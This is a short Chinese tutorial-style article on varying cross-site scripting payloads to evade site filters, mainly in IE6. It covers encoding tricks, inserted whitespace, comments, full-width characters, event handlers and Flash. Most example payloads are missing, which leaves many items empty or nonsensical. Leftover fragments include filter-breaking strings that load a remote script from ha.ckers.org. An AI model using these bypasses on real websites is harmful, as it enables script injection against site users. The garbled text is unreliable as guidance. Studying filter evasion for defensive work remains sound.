XSS不具有浏览器通用性。不同的浏览器对同一XSS的适用不一样。相比较而言,IE8和Firefox相对更安全,本身就对XSS***有更严格的过滤。而IE6的安全性一般,即使***者的代码有些“变形”,浏览器还是会“尽力而为”的解析。而其他的一些浏览器如opera,XSS安全处理可能做得更差。
本文基本上是在IE6的基础上给大家分析XSS的变形和绕过。以便大家有针对性的防护。作者参阅了互联网上一些XSS***实战的例子,汇总成此文。
一、具体内容
XSS的一般原始构造:
上述构造方式由于太过直接而容易被过滤,实际上,针对不同站点的不同过滤机制,对原始构造的适当变形有时就能绕过不少对XSS的检测。
二、发展
1:很简单,大家都知道会把
2:
< /p>
3:当简单的"javascript"形式也被彻底过滤后。我们发现很多对象支持“ASCII”的表示方法,
< /p>
< /p>
< /p>
< /p>
a可以写成a,a直至a也是可以执行的。
a也是可以写成=,=直至=的。
4:如果上述编码亦被还原过滤,可以填入空格、制表符、换行符等空白字符:
5:也可以嵌入编码过后的TAB键等,char09,char10,char13都可以被嵌入:
6:当直接用“javascript”终于被彻底禁绝,我们还可以使用其他属性执行XSS。
7:然后,理所当然衍生了新的绕过方式和利用形式。
A):插入注释/*....*/做干扰
B):全角字符的干扰
C):“\”的干扰
8:如果直接执行被完全过滤,那我们就利用事件来执行XSS
9:flash可以用来执行XSS
10:也可以利用各种其他标签
< /p>< /p>
其他的一些用于混淆、干扰和绕过的bypass实例:
"SRC="http://ha.ckers.org/xss.js">
'>"SRC="http://ha.ckers.org/xss.js">
perl-e'print"alert(\"XSS\")";'>out
< /p>
如上,就是一些比较常见和实用的XSS绕过方法。在实际的运用中,往往是多种方法结合起来。
更多更详尽的XSS测试脚本,可参见http://ha.ckers.org/xss.html建议参阅《OWASP测试指南》,对一些相关的web安全知识做全面的了解。
By:anyunix